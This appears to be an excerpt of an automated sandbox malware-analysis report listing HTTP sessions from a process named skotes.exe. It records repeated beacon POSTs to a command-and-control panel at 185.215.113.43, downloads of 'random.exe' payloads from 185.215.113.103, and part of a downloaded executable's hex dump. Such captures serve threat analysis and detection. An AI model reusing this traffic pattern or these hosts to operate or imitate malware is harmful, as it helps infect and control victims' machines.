                  Sep 25, 2024 10:33:25.592719078 CEST184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 31
                  Cache-Control: no-cache
                  Data Raw: 65 31 3d 31 30 30 30 30 32 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                  Data Ascii: e1=1000023001&unit=246122658369
                  Sep 25, 2024 10:33:26.537611961 CEST193INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:33:26 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 4 <c>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  10192.168.2.664684185.215.113.103801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:33:26.545012951 CEST145OUTGET /steam/random.exe HTTP/1.1
                  Host: 185.215.113.103
                  If-Modified-Since: Wed, 25 Sep 2024 08:32:53 GMT
                  If-None-Match: "66000-622ed77d44b57"
                  Sep 25, 2024 10:33:27.260623932 CEST195INHTTP/1.1 304 Not Modified
                  Date: Wed, 25 Sep 2024 08:33:27 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Last-Modified: Wed, 25 Sep 2024 08:32:53 GMT
                  ETag: "66000-622ed77d44b57"
                  Accept-Ranges: bytes


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  11192.168.2.664686185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:33:29.583525896 CEST184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 31
                  Cache-Control: no-cache
                  Data Raw: 64 31 3d 31 30 30 30 30 32 36 30 30 32 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                  Data Ascii: d1=1000026002&unit=246122658369
                  Sep 25, 2024 10:33:30.306199074 CEST193INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:33:30 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 4 <c>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  12192.168.2.664687185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:33:31.958144903 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:33:32.666846037 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:33:32 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  13192.168.2.664688185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:33:34.176270962 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:33:34.904834032 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:33:34 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  14192.168.2.664689185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:33:36.539182901 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:33:37.230500937 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:33:37 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  15192.168.2.664691185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:33:38.739002943 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:33:39.471823931 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:33:39 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  16192.168.2.664692185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:33:41.118402004 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:33:41.811949968 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:33:41 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  17192.168.2.664693185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:33:43.333014965 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:33:44.055486917 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:33:43 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  18192.168.2.664694185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:33:45.692390919 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:33:46.393695116 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:33:46 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination Port
                  19192.168.2.664695185.215.113.10380
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:33:47.809348106 CEST81OUTGET /mine/random.exe HTTP/1.1
                  Host: 185.215.113.103
                  Cache-Control: no-cache
                  Sep 25, 2024 10:33:48.531085968 CEST1236INHTTP/1.1 200 OK
                  Date: Wed, 25 Sep 2024 08:33:48 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Last-Modified: Wed, 25 Sep 2024 08:32:47 GMT
                  ETag: "68e00-622ed777f557e"
                  Accept-Ranges: bytes
                  Content-Length: 429568
                  Content-Type: application/x-msdos-program
                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1f d2 8a d1 5b b3 e4 82 5b b3 e4 82 5b b3 e4 82 34 c5 4f 82 4d b3 e4 82 34 c5 7a 82 7b b3 e4 82 34 c5 4e 82 28 b3 e4 82 52 cb 77 82 52 b3 e4 82 5b b3 e5 82 d4 b3 e4 82 34 c5 4b 82 5a b3 e4 82 34 c5 7e 82 5a b3 e4 82 34 c5 79 82 5a b3 e4 82 52 69 63 68 5b b3 e4 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e4 7f de 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 ae 04 00 00 06 05 00 00 00 00 00 33 f9 03 00 00 10 00 00 00 c0 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 09 00 00 04 00 00 0b 31 07 00 02 00 00 81 00 00 [TRUNCATED]
                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$[[[4OM4z{4N(RwR[4KZ4~Z4yZRich[PELe3@1td@|h @ .text `.datap^@.rsrc|@~@@
                  Sep 25, 2024 10:33:48.531150103 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 b9 04 00 c2 b9 04 00 b6 b9 04 00 a4 b9 04 00 92 b9 04 00 e4 b9 04 00 00 00 00 00 86 b4 04 00 a0 b4 04 00 ba b4 04 00 ce b4
                  Data Ascii: :Nf~.D\n.rThv
                  Sep 25, 2024 10:33:48.531183004 CEST1236INData Raw: 69 00 6d 00 65 00 20 00 65 00 72 00 72 00 6f 00 72 00 20 00 00 00 00 00 0d 00 0a 00 00 00 00 00 54 00 4c 00 4f 00 53 00 53 00 20 00 65 00 72 00 72 00 6f 00 72 00 0d 00 0a 00 00 00 53 00 49 00 4e 00 47 00 20 00 65 00 72 00 72 00 6f 00 72 00 0d 00
                  Data Ascii: ime error TLOSS errorSING errorDOMAIN errorR6033- Attempt to use MSIL code from this assembly during
                  Sep 25, 2024 10:33:48.531217098 CEST672INData Raw: 72 00 20 00 73 00 74 00 64 00 69 00 6f 00 20 00 69 00 6e 00 69 00 74 00 69 00 61 00 6c 00 69 00 7a 00 61 00 74 00 69 00 6f 00 6e 00 0d 00 0a 00 00 00 00 00 00 00 00 00 52 00 36 00 30 00 32 00 35 00 0d 00 0a 00 2d 00 20 00 70 00 75 00 72 00 65 00
                  Data Ascii: r stdio initializationR6025- pure virtual function callR6024- not enough space for _onexit/atexit table
                  Sep 25, 2024 10:33:48.531267881 CEST1236INData Raw: 39 00 0d 00 0a 00 2d 00 20 00 6e 00 6f 00 74 00 20 00 65 00 6e 00 6f 00 75 00 67 00 68 00 20 00 73 00 70 00 61 00 63 00 65 00 20 00 66 00 6f 00 72 00 20 00 65 00 6e 00 76 00 69 00 72 00 6f 00 6e 00 6d 00 65 00 6e 00 74 00 0d 00 0a 00 00 00 52 00
                  Data Ascii: 9- not enough space for environmentR6008- not enough space for argumentsR6002- floating point support not lo
                  Sep 25, 2024 10:33:48.531300068 CEST1236INData Raw: 04 00 00 00 00 00 00 00 8d 00 00 c0 08 00 00 00 00 00 00 00 8e 00 00 c0 08 00 00 00 00 00 00 00 8f 00 00 c0 08 00 00 00 00 00 00 00 90 00 00 c0 08 00 00 00 00 00 00 00 91 00 00 c0 08 00 00 00 00 00 00 00 92 00 00 c0 08 00 00 00 00 00 00 00 93 00
                  Data Ascii: KERNEL32.DLLFlsFreeFlsSetValueFlsGetValueFlsAlloc_nextafter_logb_yn_y1_y0fre
                  Sep 25, 2024 10:33:48.531332970 CEST1236INData Raw: 6f 72 6d 61 74 69 6f 6e 57 00 00 00 47 65 74 4c 61 73 74 41 63 74 69 76 65 50 6f 70 75 70 00 00 47 65 74 41 63 74 69 76 65 57 69 6e 64 6f 77 00 4d 65 73 73 61 67 65 42 6f 78 57 00 55 00 53 00 45 00 52 00 33 00 32 00 2e 00 44 00 4c 00 4c 00 00 00
                  Data Ascii: ormationWGetLastActivePopupGetActiveWindowMessageBoxWUSER32.DLLfq@@6C??expAZDDDq[D !"#$%&'()*+,-./0123456789:;
                  Sep 25, 2024 10:33:48.531364918 CEST1236INData Raw: e8 69 39 3e 00 00 00 00 00 80 f3 3f 00 00 00 54 7c ac ec 3f 27 5c 1b f2 7c 23 3c 3e 00 00 00 00 00 00 f4 3f 00 00 00 24 e2 0e ed 3f ce 7d b2 64 6a 88 23 3e 00 00 00 00 00 80 f4 3f 00 00 00 cc 57 6e ed 3f d7 88 13 4d 56 78 3a 3e 00 00 00 00 00 00
                  Data Ascii: i9>?T|?'\|#<>?$?}dj#>?Wn?MVx:>?,?18o,>?D$?c/>?@ |?x7|1>?|?9>?p #?IAu=>?s?x4>?p?edf&.
                  Sep 25, 2024 10:33:48.531414986 CEST1236INData Raw: 00 00 00 30 f3 b8 f3 3f 37 da a8 2e ea 59 18 3e 00 00 00 00 00 c0 06 40 00 00 00 50 e6 c6 f3 3f 9b 1d 5b eb 08 70 26 3e 00 00 00 00 00 00 07 40 00 00 00 d8 94 d4 f3 3f 68 34 8c 4d ee f8 41 3e 00 00 00 00 00 40 07 40 00 00 00 ac 00 e2 f3 3f 45 d6
                  Data Ascii: 0?7.Y>@P?[p&>@?h4MA>@@?EplE>@+?o$E>@h?\*K>@?-?B>@@P8?(l|@>@p!?u@J>@@p-?V1>@
                  Sep 25, 2024 10:33:48.531450033 CEST1236INData Raw: 25 0c 46 3e 00 00 00 00 00 c0 11 40 00 00 00 04 40 9c f5 3f 1e 52 ab 78 5e 7f 44 3e 00 00 00 00 00 e0 11 40 00 00 00 50 50 a2 f5 3f 86 16 c6 00 73 8a 40 3e 00 00 00 00 00 00 12 40 00 00 00 34 4c a8 f5 3f 50 8f 5f 21 0a be 23 3e 00 00 00 00 00 20
                  Data Ascii: %F>@@?Rx^D>@PP?s@>@4L?P_!#> @4?:#G>@@L?qg:&J>`@H?5L$.4>@\w?!1C>@?[<>@D?<=@?~
                  Sep 25, 2024 10:33:48.536384106 CEST1236INData Raw: 00 00 00 dc 61 84 f6 3f 52 e2 7e 15 8d d7 e4 3d 00 00 00 00 00 40 18 40 00 00 00 74 c1 87 f6 3f 51 4e 54 09 aa ec 42 3e 00 00 00 00 00 60 18 40 00 00 00 78 18 8b f6 3f d6 57 33 04 63 e9 4c 3e 00 00 00 00 00 80 18 40 00 00 00 0c 67 8e f6 3f e5 2b
                  Data Ascii: a?R~=@@t?QNTB>`@x?W3cL>@g?+(=@D?qJK>@L?;,*>@8!?D>@,O? E> @Du?in]D>@@?%3F>`@


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  20192.168.2.664696185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:33:47.912702084 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:33:48.615928888 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:33:48 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  21192.168.2.664699185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:33:50.598237991 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:33:52.074147940 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:33:51 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 10:33:52.074501991 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:33:51 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 10:33:52.074774981 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:33:51 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  22192.168.2.664703185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:33:53.583134890 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:33:54.279970884 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:33:54 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  23192.168.2.664706185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:33:56.020462990 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:33:56.739073038 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:33:56 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  24192.168.2.664709185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:33:58.498434067 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
                  Sep 25, 2024 10:33:59.983700991 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:33:59 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0
                  Sep 25, 2024 10:33:59.983825922 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:33:59 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0
                  Sep 25, 2024 10:33:59.983956099 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:33:59 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  25192.168.2.664711185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:34:01.613986015 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 10:34:02.323259115 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 08:34:02 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  26192.168.2.664712185.215.113.43801488C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 10:34:03.832753897 CEST314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.43
                  Content-Length: 160
                  Cache-Control: no-cache
